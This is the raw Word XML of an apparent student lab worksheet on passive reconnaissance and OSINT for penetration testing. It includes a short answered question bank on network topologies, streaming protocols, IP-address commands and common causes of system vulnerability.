          <w:p w14:paraId="4C685E83" w14:textId="77777777" w:rsidR="00DF4764" w:rsidRPr="001C411D" w:rsidRDefault="00DF4764" w:rsidP="00F3558E">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5AFEA3D3" w14:textId="77777777" w:rsidR="0034147C" w:rsidRPr="001C411D" w:rsidRDefault="0034147C" w:rsidP="0034147C">
            <w:p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understand which type of passive information can be gathered to exploit the target machine</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75DFC67E"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223AD257" w14:textId="77777777" w:rsidTr="00F3558E">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A785950" w14:textId="77777777"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6607272E" w14:textId="77777777" w:rsidR="007C6AD1" w:rsidRPr="001C411D" w:rsidRDefault="007C6AD1" w:rsidP="00F3558E">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3B76F6BD" w14:textId="77777777" w:rsidR="00F3558E" w:rsidRPr="001C411D" w:rsidRDefault="0034147C" w:rsidP="00F3558E">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="0" w:name="_Hlk47089082"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Perform reconnaissance to find all the relevant information on selected website using 10 information gathering tools</w:t>
            </w:r>
            <w:bookmarkEnd w:id="0"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>(Including 4 Kali Linux Tools)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DE48122"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13063B" w:rsidRPr="001C411D" w14:paraId="074F7D32" w14:textId="77777777" w:rsidTr="00F3558E">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45A4170A" w14:textId="77777777" w:rsidR="00DF4764" w:rsidRPr="001C411D" w:rsidRDefault="00DF4764" w:rsidP="00F3558E">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4314C6C1" w14:textId="77777777" w:rsidR="0013063B" w:rsidRPr="001C411D" w:rsidRDefault="0013063B"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0F19B814" w14:textId="77777777" w:rsidR="0013063B" w:rsidRPr="001C411D" w:rsidRDefault="0013063B" w:rsidP="00F3558E">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="68B78233" w14:textId="77777777" w:rsidR="0034147C" w:rsidRPr="001C411D" w:rsidRDefault="0034147C" w:rsidP="00CF046C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>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OSINT gathering is an important first step in penetration testing. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="630ABB70" w14:textId="77777777" w:rsidR="0034147C" w:rsidRPr="001C411D" w:rsidRDefault="0034147C" w:rsidP="00CF046C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>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Gathering as much intelligence on your organization and the potential targets for exploit.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DC59A85" w14:textId="77777777" w:rsidR="0034147C" w:rsidRPr="001C411D" w:rsidRDefault="0034147C" w:rsidP="00CF046C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>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Clear understanding of the client’s systems and operations before you begin exploiting. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10C5AA33" w14:textId="77777777" w:rsidR="0034147C" w:rsidRPr="001C411D" w:rsidRDefault="0034147C" w:rsidP="00CF046C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>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How a target works and its potential vulnerabilities.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C579A75" w14:textId="77777777" w:rsidR="0034147C" w:rsidRPr="001C411D" w:rsidRDefault="0034147C" w:rsidP="00DA1F8B">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="77CD6499" w14:textId="77777777" w:rsidR="0034147C" w:rsidRPr="001C411D" w:rsidRDefault="0034147C" w:rsidP="0034147C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="720"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="265C0C33" wp14:editId="344CC8FC">
                  <wp:extent cx="5426454" cy="2327563"/>
                  <wp:effectExtent l="0" t="0" r="60325" b="0"/>
                  <wp:docPr id="20" name="Diagram 20">
                    <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{887A486A-E98E-4154-A63E-3F6FAFEF5A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994994" w14:textId="77777777" w:rsidR="0013063B" w:rsidRPr="001C411D" w:rsidRDefault="0013063B" w:rsidP="00F3558E">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1CA88052" w14:textId="77777777" w:rsidR="0013063B" w:rsidRPr="001C411D" w:rsidRDefault="0013063B" w:rsidP="00F3558E">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DF4764" w:rsidRPr="001C411D" w14:paraId="3835AA3B" w14:textId="77777777" w:rsidTr="00F3558E">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="0F828B82" w14:textId="77777777" w:rsidR="00DF4764" w:rsidRPr="001C411D" w:rsidRDefault="00DF4764" w:rsidP="00DF4764">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="3330"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
              </w:rPr>
              <w:t>Question Bank:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7960D73F" w14:textId="77777777" w:rsidR="001C411D" w:rsidRPr="001C411D" w:rsidRDefault="0029041B" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="31"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="3330"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>In which topology there is a central controller or hub?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C25ECC2" w14:textId="72EFECEB" w:rsidR="001C411D" w:rsidRPr="001C411D" w:rsidRDefault="001C411D" w:rsidP="001C411D">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="3330"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
              </w:rPr>
              <w:t>The topology in which there is a central controller or hub is the Star topology.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="594B631B" w14:textId="77777777" w:rsidR="001C411D" w:rsidRPr="001C411D" w:rsidRDefault="001C411D" w:rsidP="001C411D">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="3330"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="241F5521" w14:textId="77777777" w:rsidR="001C411D" w:rsidRDefault="0029041B" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="31"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="3330"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Which topology covers security, robust and eliminating traffic factor?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AB2F023" w14:textId="7EB29587" w:rsidR="001C411D" w:rsidRPr="001C411D" w:rsidRDefault="001C411D" w:rsidP="001C411D">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="3330"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
              </w:rPr>
              <w:t>The Mesh topology covers security and robustness, as it provides multiple paths for data to travel between devices, ensuring that if one path is blocked or damaged, the data can still reach its destination. Additionally, because data is not forced to travel through a central hub, it can eliminate traffic bottlenecks.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C7ED790" w14:textId="77777777" w:rsidR="001C411D" w:rsidRPr="001C411D" w:rsidRDefault="001C411D" w:rsidP="001C411D">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="3330"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1A191B56" w14:textId="77777777" w:rsidR="001C411D" w:rsidRDefault="0029041B" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="31"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="3330"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Video streaming is done through which protocol??</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42F5DADF" w14:textId="77733730" w:rsidR="001C411D" w:rsidRPr="001C411D" w:rsidRDefault="001C411D" w:rsidP="001C411D">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="3330"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
              </w:rPr>
              <w:t>Video streaming can be done through a variety of protocols, such as HTTP, RTMP, or HLS, depending on the specific application and requirements.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B6E31B9" w14:textId="77777777" w:rsidR="001C411D" w:rsidRDefault="001C411D" w:rsidP="001C411D">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="3330"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="390A9724" w14:textId="77777777" w:rsidR="001C411D" w:rsidRDefault="0029041B" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="31"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="3330"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Which command is used to find the IP address of your system?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B736382" w14:textId="423CFEDF" w:rsidR="001C411D" w:rsidRPr="001C411D" w:rsidRDefault="001C411D" w:rsidP="001C411D">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="3330"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
              </w:rPr>
              <w:t>The command used to find the IP address of your system depends on the operating system. On Windows, you can use the command "ipconfig" in the Command Prompt. On macOS or Linux, you can use the command "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
              </w:rPr>
              <w:t>ifconfig</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
              </w:rPr>
              <w:t>" in the Terminal.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13799C71" w14:textId="77777777" w:rsidR="001C411D" w:rsidRPr="001C411D" w:rsidRDefault="001C411D" w:rsidP="001C411D">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="3330"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0B22EC11" w14:textId="77777777" w:rsidR="001C411D" w:rsidRDefault="0029041B" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="31"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="3330"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
              </w:rPr>
              <w:t>Why are systems vulnerable?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B3545A2" w14:textId="47EA85FC" w:rsidR="001C411D" w:rsidRPr="001C411D" w:rsidRDefault="001C411D" w:rsidP="001C411D">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="3330"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
              </w:rPr>
              <w:t>Systems are vulnerable for a variety of reasons, including:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15BD0809"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Outdated software that contains known security vulnerabilities</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FE9ECE2"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Weak passwords or authentication mechanisms</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C3142A4"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Lack of proper security controls, such as firewalls or intrusion detection systems</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28D64B52"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 xml:space="preserve">Social engineering attacks, such as phishing or spear-phishing, which can trick users into revealing sensitive </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4014560A"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information</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6735A1E3" w14:textId="77777777" w:rsidR="001C411D" w:rsidRPr="001C411D" w:rsidRDefault="001C411D" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="32"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
              </w:rPr>
              <w:t>Malware infections, which can be introduced through email attachments, malicious websites, or other means.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="419CD21E" w14:textId="41CB1581" w:rsidR="001C411D" w:rsidRPr="001C411D" w:rsidRDefault="001C411D" w:rsidP="0029041B">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="3330"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7DD07165" w14:textId="77777777" w:rsidR="00DF4764" w:rsidRPr="001C411D" w:rsidRDefault="00DF4764" w:rsidP="00DF4764">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="409B3956" w14:textId="77777777" w:rsidR="00D332B8" w:rsidRPr="001C411D" w:rsidRDefault="00D332B8" w:rsidP="00DF4764">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DF365A5" w14:textId="48EFDBC8" w:rsidR="0029041B" w:rsidRPr="001C411D" w:rsidRDefault="0029041B" w:rsidP="00DF4764">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34CF6A6A" w14:textId="1432276C" w:rsidR="00476F60" w:rsidRPr="001C411D" w:rsidRDefault="00476F60" w:rsidP="00DF4764">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="631F1593" w14:textId="77777777" w:rsidR="00476F60" w:rsidRPr="001C411D" w:rsidRDefault="00476F60" w:rsidP="00DF4764">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D8F36C5" w14:textId="77777777" w:rsidR="00D332B8" w:rsidRPr="001C411D" w:rsidRDefault="00D332B8" w:rsidP="00DF4764">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A34F684" w14:textId="77777777" w:rsidR="00D332B8" w:rsidRPr="001C411D" w:rsidRDefault="00D332B8" w:rsidP="00DF4764">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CE1DC59" w14:textId="77777777" w:rsidR="00D332B8" w:rsidRPr="001C411D" w:rsidRDefault="00D332B8" w:rsidP="00DF4764">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FCF3D96" w14:textId="77777777" w:rsidR="00D332B8" w:rsidRPr="001C411D" w:rsidRDefault="00D332B8" w:rsidP="00DF4764">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C7A9C0D" w14:textId="77777777" w:rsidR="00D332B8" w:rsidRPr="001C411D" w:rsidRDefault="00D332B8" w:rsidP="00DF4764">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18BC2CA8" w14:textId="7F673971" w:rsidR="00DF4764" w:rsidRPr="001C411D" w:rsidRDefault="00037D14" w:rsidP="00373A0F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00DF4764" w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Student Work Area</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0609F34A" w14:textId="77777777" w:rsidR="00DF4764" w:rsidRDefault="00DF4764" w:rsidP="00DF4764">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74614CD2" w14:textId="1E07046F" w:rsidR="00EA6165" w:rsidRDefault="002625AC" w:rsidP="00DF4764">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
